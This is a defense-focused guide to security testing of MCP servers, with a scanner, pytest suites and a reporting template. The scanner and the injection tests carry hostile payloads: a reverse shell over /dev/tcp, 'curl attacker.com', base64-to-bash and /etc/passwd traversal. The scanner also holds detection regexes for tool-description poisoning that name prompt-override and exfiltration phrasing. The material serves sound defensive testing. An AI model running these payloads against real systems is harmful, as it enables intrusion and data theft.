MCP Security Testing: How to Test MCP Servers for Vulnerabilities
Advanced18 min readUpdated 2026-03-24
A defense-focused guide to security testing MCP server implementations -- methodology for MCP security assessments, scanning tools, common test cases for auth bypass, injection, traversal, and data leaks, with working test scripts and reporting templates.
Security testing of MCP servers requires a specialized methodology because MCP sits at the intersection of traditional application security (HTTP, authentication, input validation) and AI-specific risks (prompt injection, token amplification, tool description poisoning). Standard web application scanners miss MCP-specific vulnerabilities, and AI security tools typically focus on the LLM rather than the tool infrastructure.
MCP Security Assessment Methodology
Phase Overview
┌───────────────────────────────────────────────────────────────┐
│ MCP Security Assessment Phases │
├────────────┬──────────────────────────────────────────────────┤
│ Phase 1 │ Reconnaissance and Discovery │
│ │ - Identify all MCP servers in scope │
│ │ - Enumerate tools, transports, and capabilities │
│ │ - Map trust boundaries and data flows │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 2 │ Authentication and Authorization Testing │
│ │ - Test for unauthenticated access │
│ │ - Test token/credential handling │
│ │ - Verify per-tool authorization scopes │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 3 │ Input Validation Testing │
│ │ - Command injection in all parameters │
│ │ - Path traversal in file operations │
│ │ - SQL injection in database tools │
│ │ - Tool description poisoning analysis │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 4 │ Session and State Testing │
│ │ - Cross-session data isolation │
│ │ - Session fixation and hijacking │
│ │ - State cleanup on disconnect │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 5 │ Resource and Cost Testing │
│ │ - Token amplification (sampling abuse) │
│ │ - Output size abuse │
│ │ - Rate limiting effectiveness │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 6 │ Supply Chain and Configuration Review │
│ │ - Package integrity verification │
│ │ - SDK version validation │
│ │ - Network exposure assessment │
│ │ - Container/sandbox configuration review │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 7 │ Reporting and Remediation │
│ │ - Findings documentation │
│ │ - Risk scoring and prioritization │
│ │ - Remediation recommendations │
│ │ - Retest verification │
└────────────┴──────────────────────────────────────────────────┘
Setting Up a Safe Test Environment
Docker-Based Test Lab
# docker-compose.test.yaml
# Isolated test environment for MCP security testing
version: "3.8"
services:
# Target MCP server (the server being tested)
target-mcp-server:
build:
context: ./target-server
container_name: mcp-test-target
ports:
- "8080:8080"
environment:
- MCP_AUTH_ENABLED=true
- MCP_AUTH_TOKEN=test-token-for-testing-only
- MCP_WORKSPACE=/workspace
volumes:
- test-workspace:/workspace
networks:
- test-network
# MCP security scanner
mcp-scanner:
build:
context: ./scanner
dockerfile: Dockerfile.scanner
container_name: mcp-scanner
environment:
- TARGET_URL=http://target-mcp-server:8080
- TEST_TOKEN=test-token-for-testing-only
volumes:
- ./reports:/reports
networks:
- test-network
depends_on:
- target-mcp-server
# Network traffic capture
tcpdump:
image: nicolaka/netshoot
container_name: mcp-traffic-capture
command: tcpdump -i any -w /captures/mcp-traffic.pcap port 8080
volumes:
- ./captures:/captures
networks:
- test-network
cap_add:
- NET_RAW
- NET_ADMIN
volumes:
test-workspace:
networks:
test-network:
driver: bridge#!/bin/bash
# setup-test-lab.sh -- Set up the MCP security testing environment
set -euo pipefail
echo "[*] Creating test workspace with sample files..."
mkdir -p target-server/workspace
echo "public content" > target-server/workspace/public.txt
echo "SECRET_API_KEY=sk-test-12345" > target-server/workspace/.env
mkdir -p target-server/workspace/subdir
echo "nested file" > target-server/workspace/subdir/nested.txt
echo "[*] Creating reports directory..."
mkdir -p reports captures
echo "[*] Starting test environment..."
docker compose -f docker-compose.test.yaml up -d
echo "[*] Waiting for services..."
sleep 5
echo "[*] Verifying test environment..."
curl -s http://localhost:8080/health && echo " -- MCP server healthy"
echo "[+] Test environment ready."
echo " Target: http://localhost:8080"
echo " Reports: ./reports/"
echo " Captures: ./captures/"MCP Security Scanner
"""
MCP Security Scanner
Comprehensive security testing tool for MCP server implementations.
"""
import asyncio
import aiohttp
import json
import time
import logging
from dataclasses import dataclass, field
from typing import Optional
from datetime import datetime
from enum import Enum
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("mcp.scanner")
class Severity(Enum):
CRITICAL = "critical"
HIGH = "high"
MEDIUM = "medium"
LOW = "low"
INFO = "info"
@dataclass
class Finding:
"""A security finding from the scan."""
title: str
severity: Severity
category: str
description: str
evidence: str = ""
remediation: str = ""
references: list[str] = field(default_factory=list)
cvss_score: float = 0.0
@dataclass
class ScanResult:
"""Complete scan results."""
target_url: str
scan_start: datetime
scan_end: Optional[datetime] = None
findings: list[Finding] = field(default_factory=list)
tools_discovered: list[dict] = field(default_factory=list)
server_info: dict = field(default_factory=dict)
class MCPSecurityScanner:
"""
Security scanner for MCP servers.
Tests for common vulnerabilities identified in MCP security research.
"""
def __init__(self, target_url: str, auth_token: str = None):
self.target_url = target_url.rstrip("/")
self.auth_token = auth_token
self.result = ScanResult(
target_url=target_url,
scan_start=datetime.utcnow(),
)
def _headers(self) -> dict:
headers = {"Content-Type": "application/json"}
if self.auth_token:
headers["Authorization"] = f"Bearer {self.auth_token}"
return headers
async def _jsonrpc_call(self, session: aiohttp.ClientSession,
method: str, params: dict = None,
msg_id: int = 1) -> dict:
"""Send a JSON-RPC request to the MCP server."""
payload = {
"jsonrpc": "2.0",
"method": method,
"id": msg_id,
}
if params:
payload["params"] = params
async with session.post(
f"{self.target_url}/messages/",
json=payload,
headers=self._headers(),
) as resp:
return await resp.json()
async def run_full_scan(self):
"""Run all security test phases."""
async with aiohttp.ClientSession() as session:
logger.info("Starting MCP security scan: %s", self.target_url)
await self.phase1_discovery(session)
await self.phase2_authentication(session)
await self.phase3_input_validation(session)
await self.phase4_session_isolation(session)
await self.phase5_resource_abuse(session)
self.result.scan_end = datetime.utcnow()
logger.info(
"Scan complete. Findings: %d (Critical: %d, High: %d)",
len(self.result.findings),
sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
)
return self.result
# === Phase 1: Discovery ===
async def phase1_discovery(self, session: aiohttp.ClientSession):
"""Enumerate MCP server capabilities and tools."""
logger.info("Phase 1: Discovery")
# Try to initialize
try:
init_result = await self._jsonrpc_call(session, "initialize", {
"protocolVersion": "2024-11-05",
"clientInfo": {"name": "security-scanner", "version": "1.0"},
"capabilities": {},
})
self.result.server_info = init_result.get("result", {})
logger.info("Server info: %s", self.result.server_info.get("serverInfo", {}))
except Exception as e:
logger.warning("Initialize failed: %s", e)
# List tools
try:
tools_result = await self._jsonrpc_call(session, "tools/list")
tools = tools_result.get("result", {}).get("tools", [])
self.result.tools_discovered = tools
logger.info("Discovered %d tools", len(tools))
# Analyze tool descriptions for injection patterns
for tool in tools:
self._analyze_tool_description(tool)
except Exception as e:
logger.warning("Tool enumeration failed: %s", e)
def _analyze_tool_description(self, tool: dict):
"""Check tool description for injection patterns."""
import re
desc = tool.get("description", "")
name = tool.get("name", "unknown")
suspicious_patterns = [
(r"(?i)\byou must\b", "Imperative instruction in tool description"),
(r"(?i)\balways\b.*\btool\b", "Unconditional tool directive"),
(r"https?://", "External URL in tool description"),
(r"(?i)\bignore\b.*\bprevious\b", "Prompt override pattern"),
(r"(?i)\bsend\b.*\bto\b.*https?://", "Data exfiltration instruction"),
]
for pattern, desc_text in suspicious_patterns:
if re.search(pattern, desc):
self.result.findings.append(Finding(
title=f"Suspicious tool description: {name}",
severity=Severity.HIGH,
category="tool_description_poisoning",
description=desc_text,
evidence=f"Tool '{name}' description: {desc[:300]}",
remediation="Review and sanitize tool descriptions. Remove imperative instructions and external URLs.",
references=["OWASP ASI-03"],
))
# === Phase 2: Authentication ===
async def phase2_authentication(self, session: aiohttp.ClientSession):
"""Test authentication controls."""
logger.info("Phase 2: Authentication")
# Test unauthenticated access
unauth_headers = {"Content-Type": "application/json"}
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers=unauth_headers,
) as resp:
if resp.status == 200:
body = await resp.json()
if "result" in body:
self.result.findings.append(Finding(
title="Unauthenticated access to MCP server",
severity=Severity.CRITICAL,
category="authentication",
description=(
"MCP server accepts tool listing without authentication. "
"Any network-reachable client can enumerate and call tools."
),
evidence=f"HTTP 200 response to unauthenticated tools/list",
remediation="Implement Bearer token or mTLS authentication.",
references=["VulnerableMCP", "MCP Auth Gaps"],
cvss_score=9.1,
))
elif resp.status in (401, 403):
logger.info("Authentication required (good): HTTP %d", resp.status)
except Exception as e:
logger.warning("Auth test failed: %s", e)
# Test with invalid token
bad_headers = {
"Content-Type": "application/json",
"Authorization": "Bearer invalid-token-12345",
}
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers=bad_headers,
) as resp:
if resp.status == 200:
self.result.findings.append(Finding(
title="Authentication bypass with invalid token",
severity=Severity.CRITICAL,
category="authentication",
description="Server accepts invalid authentication token.",
evidence=f"HTTP 200 with token 'invalid-token-12345'",
remediation="Verify token validation logic.",
cvss_score=9.8,
))
except Exception as e:
logger.warning("Invalid token test failed: %s", e)
# === Phase 3: Input Validation ===
async def phase3_input_validation(self, session: aiohttp.ClientSession):
"""Test input validation across all tools."""
logger.info("Phase 3: Input Validation")
for tool in self.result.tools_discovered:
tool_name = tool.get("name", "")
schema = tool.get("inputSchema", {})
properties = schema.get("properties", {})
for param_name, param_schema in properties.items():
param_type = param_schema.get("type", "string")
if param_type == "string":
# Test command injection
await self._test_command_injection(
session, tool_name, param_name
)
# Test path traversal (if parameter name suggests file path)
if any(s in param_name.lower() for s in ["path", "file", "dir", "folder"]):
await self._test_path_traversal(
session, tool_name, param_name
)
async def _test_command_injection(self, session: aiohttp.ClientSession,
tool_name: str, param_name: str):
"""Test a parameter for command injection."""
payloads = [
("basic_semicolon", "test; id"),
("pipe", "test | cat /etc/passwd"),
("backtick", "test `id`"),
("dollar_paren", "test $(whoami)"),
("newline", "test\nid"),
("and_chain", "test && curl attacker.com"),
]
for payload_name, payload in payloads:
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool_name,
"arguments": {param_name: payload},
})
# Check if the injection produced output indicating execution
result_text = json.dumps(result)
injection_indicators = ["uid=", "root:", "www-data", "nobody"]
for indicator in injection_indicators:
if indicator in result_text:
self.result.findings.append(Finding(
title=f"Command injection in {tool_name}.{param_name}",
severity=Severity.CRITICAL,
category="command_injection",
description=(
f"Parameter '{param_name}' of tool '{tool_name}' "
f"is vulnerable to command injection via {payload_name}."
),
evidence=f"Payload: {payload}\nResponse: {result_text[:500]}",
remediation=(
"Use parameterized command execution (shell=False). "
"Validate input against allowlist patterns."
),
references=["CVE-2025-6514", "OWASP Command Injection"],
cvss_score=9.6,
))
break
except Exception:
continue
async def _test_path_traversal(self, session: aiohttp.ClientSession,
tool_name: str, param_name: str):
"""Test a parameter for path traversal."""
payloads = [
("dot_dot_slash", "../../../etc/passwd"),
("absolute", "/etc/passwd"),
("encoded", "..%2f..%2f..%2fetc%2fpasswd"),
("double_encoded", "..%252f..%252f..%252fetc%252fpasswd"),
("null_byte", "valid.txt\x00../../../etc/passwd"),
]
for payload_name, payload in payloads:
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool_name,
"arguments": {param_name: payload},
})
result_text = json.dumps(result)
passwd_indicators = ["root:x:", "root:*:", "daemon:", "nobody:"]
for indicator in passwd_indicators:
if indicator in result_text:
self.result.findings.append(Finding(
title=f"Path traversal in {tool_name}.{param_name}",
severity=Severity.CRITICAL,
category="path_traversal",
description=(
f"Parameter '{param_name}' of tool '{tool_name}' "
f"is vulnerable to path traversal via {payload_name}."
),
evidence=f"Payload: {payload}\nResponse contains: {indicator}",
remediation=(
"Resolve and canonicalize paths before access. "
"Verify resolved path is within allowed base directory."
),
references=["CVE-2025-68145", "CWE-22"],
cvss_score=8.6,
))
break
except Exception:
continue
# === Phase 4: Session Isolation ===
async def phase4_session_isolation(self, session: aiohttp.ClientSession):
"""Test cross-session data isolation."""
logger.info("Phase 4: Session Isolation")
# This requires two separate connections
# Find a tool that stores/retrieves data
write_tools = [t for t in self.result.tools_discovered
if any(s in t.get("name", "").lower()
for s in ["save", "write", "remember", "store", "set"])]
read_tools = [t for t in self.result.tools_discovered
if any(s in t.get("name", "").lower()
for s in ["read", "recall", "get", "retrieve", "load"])]
if not write_tools or not read_tools:
logger.info("No write/read tool pair found for isolation testing")
return
logger.info("Testing session isolation with %s / %s",
write_tools[0]["name"], read_tools[0]["name"])
# Note: Full isolation testing requires establishing two separate
# SSE connections. This is documented in the test scripts below.
# === Phase 5: Resource Abuse ===
async def phase5_resource_abuse(self, session: aiohttp.ClientSession):
"""Test resource limits and rate limiting."""
logger.info("Phase 5: Resource Abuse")
# Test rate limiting
burst_count = 0
for i in range(50):
try:
async with session.post(
f"{self.target_url}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": i},
headers=self._headers(),
) as resp:
if resp.status == 429:
logger.info("Rate limited at request %d (good)", i)
break
burst_count += 1
except Exception:
break
if burst_count >= 50:
self.result.findings.append(Finding(
title="No rate limiting on MCP tool calls",
severity=Severity.HIGH,
category="rate_limiting",
description=(
f"Server accepted {burst_count} rapid requests without rate limiting. "
f"This enables denial-of-wallet and brute force attacks."
),
evidence=f"Sent {burst_count} requests in burst, all returned 200",
remediation="Implement rate limiting per client IP and per session.",
references=["MCP Denial of Wallet"],
))
# Test output size limits
for tool in self.result.tools_discovered:
if "query" in tool.get("name", "").lower():
try:
result = await self._jsonrpc_call(session, "tools/call", {
"name": tool["name"],
"arguments": {"query": "SELECT * FROM large_table LIMIT 1000000"},
})
result_size = len(json.dumps(result))
if result_size > 1_000_000:
self.result.findings.append(Finding(
title=f"No output size limit on {tool['name']}",
severity=Severity.MEDIUM,
category="resource_abuse",
description=f"Tool returned {result_size} bytes without truncation.",
remediation="Implement output size limits on all tools.",
))
except Exception:
continue
def generate_report(self, format: str = "json") -> str:
"""Generate the security assessment report."""
if format == "json":
return json.dumps({
"target": self.result.target_url,
"scan_start": self.result.scan_start.isoformat(),
"scan_end": self.result.scan_end.isoformat() if self.result.scan_end else None,
"summary": {
"total_findings": len(self.result.findings),
"critical": sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
"high": sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
"medium": sum(1 for f in self.result.findings if f.severity == Severity.MEDIUM),
"low": sum(1 for f in self.result.findings if f.severity == Severity.LOW),
"tools_discovered": len(self.result.tools_discovered),
},
"server_info": self.result.server_info,
"findings": [
{
"title": f.title,
"severity": f.severity.value,
"category": f.category,
"description": f.description,
"evidence": f.evidence,
"remediation": f.remediation,
"references": f.references,
"cvss_score": f.cvss_score,
}
for f in sorted(self.result.findings,
key=lambda x: x.cvss_score, reverse=True)
],
}, indent=2)
return ""
# CLI runner
async def main():
import argparse
parser = argparse.ArgumentParser(description="MCP Security Scanner")
parser.add_argument("target", help="MCP server URL")
parser.add_argument("--token", help="Authentication token")
parser.add_argument("--output", default="reports/mcp-scan.json", help="Output file")
args = parser.parse_args()
scanner = MCPSecurityScanner(args.target, auth_token=args.token)
await scanner.run_full_scan()
report = scanner.generate_report()
with open(args.output, "w") as f:
f.write(report)
print(f"\nReport written to: {args.output}")
print(f"Findings: {len(scanner.result.findings)}")
if __name__ == "__main__":
asyncio.run(main())Individual Test Scripts
Authentication Bypass Tests
"""
mcp_test_auth.py -- Authentication bypass test cases for MCP servers.
"""
import pytest
import aiohttp
import asyncio
class TestMCPAuthentication:
"""Test authentication controls on MCP servers."""
TARGET = "http://localhost:8080"
@pytest.mark.asyncio
async def test_no_token_rejected(self):
"""Request without token must be rejected."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={"Content-Type": "application/json"},
) as resp:
assert resp.status in (401, 403), \
f"Unauthenticated request accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_invalid_token_rejected(self):
"""Request with invalid token must be rejected."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer invalid-token",
},
) as resp:
assert resp.status in (401, 403), \
f"Invalid token accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_expired_token_rejected(self):
"""Request with expired token must be rejected."""
# Use a known-expired test token
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer expired-test-token-2025",
},
) as resp:
assert resp.status in (401, 403), \
f"Expired token accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_empty_bearer_rejected(self):
"""Empty bearer token must be rejected."""
async with aiohttp.ClientSession() as session:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": "Bearer ",
},
) as resp:
assert resp.status in (401, 403), \
f"Empty bearer token accepted (HTTP {resp.status})"
@pytest.mark.asyncio
async def test_sql_injection_in_token(self):
"""SQL injection in token field must be rejected safely."""
injection_tokens = [
"' OR '1'='1",
"admin'--",
"\" OR \"1\"=\"1",
"1; DROP TABLE tokens;",
]
async with aiohttp.ClientSession() as session:
for token in injection_tokens:
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {token}",
},
) as resp:
assert resp.status in (401, 403), \
f"SQL injection token accepted: {token}"Command Injection Tests
"""
mcp_test_injection.py -- Command injection test cases.
"""
import pytest
import aiohttp
import json
INJECTION_PAYLOADS = {
"semicolon": "test; id",
"pipe_to_shell": "test | bash",
"backtick": "`id`",
"dollar_paren": "$(whoami)",
"dollar_brace": "${IFS}cat${IFS}/etc/passwd",
"newline": "test\nid",
"carriage_return": "test\r\nid",
"ampersand": "test && id",
"or_chain": "test || id",
"subshell": "(id)",
"redirect": "test > /tmp/pwned",
"reverse_shell": "test; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1",
"python_exec": "test; python3 -c 'import os;os.system(\"id\")'",
"null_byte": "test\x00; id",
"base64_decode": "test; echo aWQ= | base64 -d | bash",
}
class TestCommandInjection:
"""Test all tool parameters for command injection."""
TARGET = "http://localhost:8080"
TOKEN = "test-token-for-testing-only"
@pytest.fixture
async def session(self):
async with aiohttp.ClientSession() as s:
yield s
@pytest.fixture
async def tools(self, session):
"""Discover available tools."""
async with session.post(
f"{self.TARGET}/messages/",
json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {self.TOKEN}",
},
) as resp:
data = await resp.json()
return data.get("result", {}).get("tools", [])
@pytest.mark.asyncio
@pytest.mark.parametrize("payload_name,payload", list(INJECTION_PAYLOADS.items()))
async def test_injection_blocked(self, session, tools, payload_name, payload):
"""Verify injection payloads are blocked for all string parameters."""
for tool in tools:
tool_name = tool["name"]
for param_name in tool.get("inputSchema", {}).get("properties", {}):
async with session.post(
f"{self.TARGET}/messages/",
json={
"jsonrpc": "2.0",
"method": "tools/call",
"id": 1,
"params": {
"name": tool_name,
"arguments": {param_name: payload},
},
},
headers={
"Content-Type": "application/json",
"Authorization": f"Bearer {self.TOKEN}",
},
) as resp:
data = await resp.json()
result_text = json.dumps(data).lower()
# These strings indicate successful command execution
dangerous_outputs = [
"uid=", "root:", "www-data", "nobody:",
"/bin/bash", "/bin/sh", "permission denied",
]
for indicator in dangerous_outputs:
assert indicator not in result_text, (
f"COMMAND INJECTION: {tool_name}.{param_name} "
f"with payload '{payload_name}' produced output "
f"containing '{indicator}'"
)Running the Tests
#!/bin/bash
# run-mcp-security-tests.sh -- Execute all MCP security tests
set -euo pipefail
TARGET="${1:-http://localhost:8080}"
TOKEN="${2:-test-token-for-testing-only}"
REPORT_DIR="./reports/$(date +%Y%m%d_%H%M%S)"
mkdir -p "$REPORT_DIR"
echo "=== MCP Security Test Suite ==="
echo "Target: $TARGET"
echo "Report: $REPORT_DIR"
echo ""
# Run Python scanner
echo "[*] Running MCP Security Scanner..."
python3 mcp_scanner.py "$TARGET" \
--token "$TOKEN" \
--output "$REPORT_DIR/scanner-report.json"
# Run pytest test suites
echo ""
echo "[*] Running Authentication Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
pytest mcp_test_auth.py -v --tb=short \
--junitxml="$REPORT_DIR/auth-tests.xml" 2>&1 | tee "$REPORT_DIR/auth-tests.log"
echo ""
echo "[*] Running Injection Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
pytest mcp_test_injection.py -v --tb=short \
--junitxml="$REPORT_DIR/injection-tests.xml" 2>&1 | tee "$REPORT_DIR/injection-tests.log"
echo ""
echo "[*] Generating summary report..."
python3 << PYEOF
import json, glob, os
report_dir = "$REPORT_DIR"
findings = []
# Collect scanner findings
scanner_report = os.path.join(report_dir, "scanner-report.json")
if os.path.exists(scanner_report):
with open(scanner_report) as f:
data = json.load(f)
findings.extend(data.get("findings", []))
print(f"\n{'='*60}")
print(f" MCP Security Assessment Summary")
print(f"{'='*60}")
print(f" Target: $TARGET")
print(f" Total findings: {len(findings)}")
for severity in ["critical", "high", "medium", "low"]:
count = sum(1 for f in findings if f.get("severity") == severity)
if count > 0:
print(f" {severity.upper()}: {count}")
if findings:
print(f"\n Top findings:")
for f in sorted(findings, key=lambda x: x.get("cvss_score", 0), reverse=True)[:5]:
print(f" [{f['severity'].upper()}] {f['title']}")
print(f"\n Full report: {report_dir}/")
print(f"{'='*60}")
PYEOFReporting Template
{
"report_metadata": {
"title": "MCP Server Security Assessment Report",
"version": "1.0",
"date": "2026-03-24",
"assessor": "Security Team",
"classification": "CONFIDENTIAL"
},
"executive_summary": {
"scope": "Security assessment of [MCP Server Name] version [X.Y.Z]",
"methodology": "Based on VulnerableMCP project methodology and OWASP ASI guidelines",
"overall_risk": "HIGH|MEDIUM|LOW",
"key_findings": [
"Finding summary 1",
"Finding summary 2"
],
"recommendation": "Address all CRITICAL and HIGH findings before production deployment"
},
"scope": {
"target_server": "Server name and version",
"transport_type": "HTTP+SSE | stdio",
"tools_tested": ["tool1", "tool2"],
"test_environment": "Docker-based isolated lab",
"exclusions": ["Any areas not tested"]
},
"findings": [
{
"id": "MCP-FINDING-001",
"title": "Finding title",
"severity": "CRITICAL|HIGH|MEDIUM|LOW|INFO",
"cvss_score": 9.6,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
"category": "authentication|injection|traversal|session|resource",
"status": "OPEN|REMEDIATED|ACCEPTED",
"description": "Detailed description of the vulnerability",
"impact": "What an attacker could achieve",
"steps_to_reproduce": [
"Step 1",
"Step 2"
],
"evidence": "Screenshot, log output, or response data",
"remediation": {
"short_term": "Immediate mitigation",
"long_term": "Architectural fix"
},
"references": ["CVE-XXXX-XXXXX", "OWASP reference"]
}
],
"recommendations": {
"immediate": ["Actions for this week"],
"short_term": ["Actions for next 30 days"],
"long_term": ["Architectural improvements"]
}
}References
- VulnerableMCP Project Methodology: Systematic approach to MCP vulnerability discovery
- OWASP ASI: Agentic Security Initiative -- security testing guidelines for AI agent infrastructure
- OWASP Testing Guide: Web Application Security Testing
- PTES: Penetration Testing Execution Standard -- adapted for MCP
- MCP Security Guide: Comprehensive MCP threat model
- CVE-2025-6514, CVE-2025-68145, CVE-2026-25536: Reference vulnerabilities used in test cases